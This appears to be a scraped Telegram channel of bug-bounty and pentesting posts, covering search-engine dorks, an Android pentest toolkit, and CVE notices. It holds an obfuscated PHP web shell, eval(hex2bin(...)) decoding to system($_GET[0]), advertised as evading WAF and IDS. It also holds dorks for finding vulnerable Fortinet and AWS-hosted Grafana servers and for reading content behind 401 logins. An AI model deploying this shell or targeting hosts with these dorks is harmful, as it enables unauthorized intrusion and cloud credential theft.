Brut Security
Which Android emulator do you use for mobile pentesting?
Please open Telegram to view this post
VIEW IN TELEGRAM
β€9
Brut Security
Hey guys, DarkShadow here β back again. You ever tried peeking inside a login panel that hits you with a 401 Unauthorized? No login, no creds β just pure access to the content behind it. Iβve got a wild dorking trick for that. Not your regular Google dorkβ¦
Hey Hunters,
DarkShadow here β back with a slick trick to bypass basic auth on certain subdomains! π
Seen those subdomains with login pop-ups? Yep, the classic 401 Unauthorized. Usually, you canβt access anything without creds.
But hereβs the twistβ¦
π Find 401 subdomains with:
Got one? Nice.
π₯ Bypass trick:
If the target leaks any files or fingerprints (like JS, PDF, XLS, etc.) in public indexes (like FOFA), you can often access them without auth!
π§ FOFA dork to find leaked files:
If you got 200 OK, boom π£ β youβre in.
In my test, I found a JS file that loaded fully in FOFA, even though it normally prompts for login.
So guys, did you like my basic this recon trick? Want more from DarkShadow?
#bypass
DarkShadow here β back with a slick trick to bypass basic auth on certain subdomains! π
Seen those subdomains with login pop-ups? Yep, the classic 401 Unauthorized. Usually, you canβt access anything without creds.
But hereβs the twistβ¦
π Find 401 subdomains with:
domain="target.com" && status_code="401"
Got one? Nice.
π₯ Bypass trick:
If the target leaks any files or fingerprints (like JS, PDF, XLS, etc.) in public indexes (like FOFA), you can often access them without auth!
π§ FOFA dork to find leaked files:
domain="401.target.subdomain" && (body=".php"body=".pdf" body=".xls"body=".html" body=".js"body=".json" body=".jpg"body=".conf" body=".jsp" || body=".css")
If you got 200 OK, boom π£ β youβre in.
In my test, I found a JS file that loaded fully in FOFA, even though it normally prompts for login.
π‘ Pro tip: Save the code, render it locally β and access internal content without creds!
So guys, did you like my basic this recon trick? Want more from DarkShadow?
#bypass
π24β€15π₯6π5πΏ2π³1
#BrutDroid #AndroidHacking #BugBounty #Frida #BurpSuite #Pentesting #AutomationTools #BrutSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
YouTube
Android SSL Pinning Bypass | Magisk, Frida & Burp Suite Configuration for Android Studio | BrutDroid
π BrutDroid v1.0.0 is here β your all-in-one Android emulator pentesting toolkit for pentesters, red teamers & bug bounty hunters!
β‘ Automate Frida server setup, root Android emulators with Magisk + rootAVD, install Burp certs system-wide, and bypass SSLβ¦
β‘ Automate Frida server setup, root Android emulators with Magisk + rootAVD, install Burp certs system-wide, and bypass SSLβ¦
π₯45β€7π7π2
Brut Security pinned Β«π¨ Introducing BrutDroid β The Ultimate Android Emulator Automation Toolkitπ¨ β¨ Root, Bypass, Intercept β all in just a few clicks. β¨ Powered by Frida, Magisk & Burp. Designed for Hackers. π₯ Automate your mobile testing workflow. π₯ Clean UI, real power, zero hassle.β¦Β»
Where is the reactions guys π π
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯32π10π¨βπ»7π³6β€2π«‘1
Hey Hunters,
DarkShadow back at it again, dropping something many of you probably never noticed! π
Did you know your Chrome DevTools is actually a webpage itself? π²
π URL:
Yup, you read that right.
Try this:
π₯ Open the URL
π₯ Then hit F12 inside DevTools
π₯ BOOM β you're debugging the DevTools itself π€―
Ever seen DevTools inside DevTools?
Welcome to the Devception π
Let me know in the comments β
Who just learned this for the first time?π
If you enjoy the kind of content I share, show some loveβlike, comment, and share it with your hacker fam.
#bugbountytips
DarkShadow back at it again, dropping something many of you probably never noticed! π
Did you know your Chrome DevTools is actually a webpage itself? π²
π URL:
devtools://devtools/bundled/devtools_app.html
Yup, you read that right.
Try this:
π₯ Open the URL
π₯ Then hit F12 inside DevTools
π₯ BOOM β you're debugging the DevTools itself π€―
Ever seen DevTools inside DevTools?
Welcome to the Devception π
Let me know in the comments β
Who just learned this for the first time?π
If you enjoy the kind of content I share, show some loveβlike, comment, and share it with your hacker fam.
#bugbountytips
π¨βπ»16β€12π₯4
Brut Security
π’ Heads up, folks!
Just released BrutDroid recently β an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasnβt been as strong as expected.
Might make it private soon. If youβre planning to use it or have feedback, nowβs the time! Would love your thoughts.βοΈ
β οΈ https://github.com/Brut-Security/BrutDroid/
π¬ Feel free to DM or tag me with suggestions.
β Stay Brut.
Just released BrutDroid recently β an automation toolkit for Android emulator testing. Put in a ton of effort, but honestly, the response hasnβt been as strong as expected.
Might make it private soon. If youβre planning to use it or have feedback, nowβs the time! Would love your thoughts.
π¬ Feel free to DM or tag me with suggestions.
β Stay Brut.
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - Brut-Security/BrutDroid: BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulatorβ¦
BrutDroid - Android Studio Pentest Automator: Streamline mobile pentesting with automated emulator rooting, Frida, and Burp Suite integration. - Brut-Security/BrutDroid
β€31
Please open Telegram to view this post
VIEW IN TELEGRAM
4π€£30π2π±2β€1
Perfect for anyone involved in:
Brut SecurityTake advantage of this opportunity and explore ZoomEyeβs premium features!
#BrutSecurity #ZoomEye
Please open Telegram to view this post
VIEW IN TELEGRAM
β€8
Hey Hunters,
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
When it comes to dorking and reconnaissance, which search engine is your go-to and why?
Anonymous Poll
44%
1οΈβ£ Google Dorking
25%
2οΈβ£ Shodan
20%
3οΈβ£ FOFA (now with AI!)
4%
4οΈβ£ ZoomEye
2%
5οΈβ£ Netlas
6%
6οΈβ£ Censys
β€7
Brut Security
Photo
πI made this payload that able to bypass WAF even IDS to execute RCEπ
πHex decode:
π€« DarkShadow's secret payload don't share outside β
<?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>
πHex decode:
if($x_=$_GET[0]){system($x_);
}
π€« DarkShadow's secret payload don't share outside β
β€20πΏ8π3π€2
CVE-2025-32756: Buffer Overflow in Fortinet products, 9.8 rating π₯
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
π Link: https://nt.ls/nmu5K
π Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
Some Fortinet products, including FortiMail, FortiRecorder, and FortiVoice, are vulnerable to a buffer overflow that could allow a remote, unauthenticated attacker to execute arbitrary code or commands.
The vulnerability is not new, but a PoC was recently released!
Search at Netlas.io:
π Link: https://nt.ls/nmu5K
π Dork: certificate.subject.common_name:"FortiMail" OR certificate.subject.common_name:"FortiRecorder" OR certificate.subject.common_name:"FortiVoice"
Vendor's advisory: https://fortiguard.fortinet.com/psirt/FG-IR-25-254
1π₯8β€4π«‘1
Hey Hunter's,
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
Grep the full dork in comment π₯
#dork #fofa #bugbountytips
DarkShadow here back again, just dropping a simple FOFA dork that i made to find all Grafana vulnerable versions which are using AWS and that help to you read all cloud metadata through Grafana SSRF CVE-2025-4123
FOFA dork:
app="grafana" && cloud_name="aws" && (body="Grafana v10.0.0"body="Grafana v10.0.1" body="Grafana v10.0.2"body="Grafana v10.0.3" body="Grafana v10.0.4"body="Grafana v10.0.5" body="Grafana v10.0.6"body="Grafana v10.0.7" body="Grafana v10.0.8"body="Grafana v10.0.9" body="Grafana v10.0.10"body="Grafana v10.0.11" body="Grafana v10.0.12"body="Grafana v10.1.0" body="Grafana v10.1.1"body="Grafana v10.1.2" body="Grafana v10.1.3"body="Grafana v10.1.4" body="Grafana v10.1.5"body="Grafana v10.1.6" body="Grafana v10.1.7"body="Grafana v10.1.8" body="Grafana v10.1.9"body="Grafana v10.1.10" body="Grafana v10.2.0"body="Grafana v10.2.1" body="Grafana v10.2.2"body="Grafana v10.2.3" body="Grafana v10.2.4"body="Grafana v10.2.5" body="Grafana v10.2.6"body="Grafana v10.2.7" body="Grafana v10.3.0"body="Grafana v10.3.1" body="Grafana v10.3.2"body="Grafana v10.3.3" body="Grafana v10.3.4"body="Grafana v10.3.5" body="Grafana v10.4.0"body="Grafana v10.4.1" body="Grafana v10.4.2"body="Grafana v10.4.3" body="Grafana v10.4.4"body="Grafana v10.4.5" body="Grafana v10.4.6"body="Grafana v10.4.7" body="Grafana v10.4.8"body="Grafana v10.4.9" body="Grafana v10.4.10"body="Grafana v10.4.11" body="Grafana v10.4.12"body="Grafana v10.4.13" body="Grafana v10.4.14"body="Grafana v10.4.15" body="Grafana v10.4.16"body="Grafana v10.4.17" body="Grafana v11.0.0"body="Grafana v11.0.1" body="Grafana v11.0.2"body="Grafana v11.0.3" body="Grafana v11.0.4"body="Grafana v11.0.5" body="Grafana v11.1.0"body="Grafana v11.1.1" body="Grafana v11.1.2"body="Grafana v11.1.3" body="Grafana v11.1.4"body="Grafana v11.2.0" body="Grafana v11.2.1"body="Grafana v11.2.2" body="Grafana v11.2.3"body="Grafana v11.3.0" body="Grafana v11.3.1"body="Grafana v11.3.2" body="Grafana v11.3.3"body="Grafana v11.4.0" body="Grafana v11.4.1"body="Grafana v11.4.2" body="Grafana v11.4.3"body="Grafana v11.5.0" body="Grafana v11.5.1"body="Grafana v11.5.2" body="Grafana v11.5.3"body="Grafana v11.5.4" body="Grafana v11.5.5"body="Grafana v11.5.6" body="Grafana v11.6.0" || body="Grafana v12.0.0")
Grep the full dork in comment π₯
#dork #fofa #bugbountytips
β€18π₯7π2πΏ1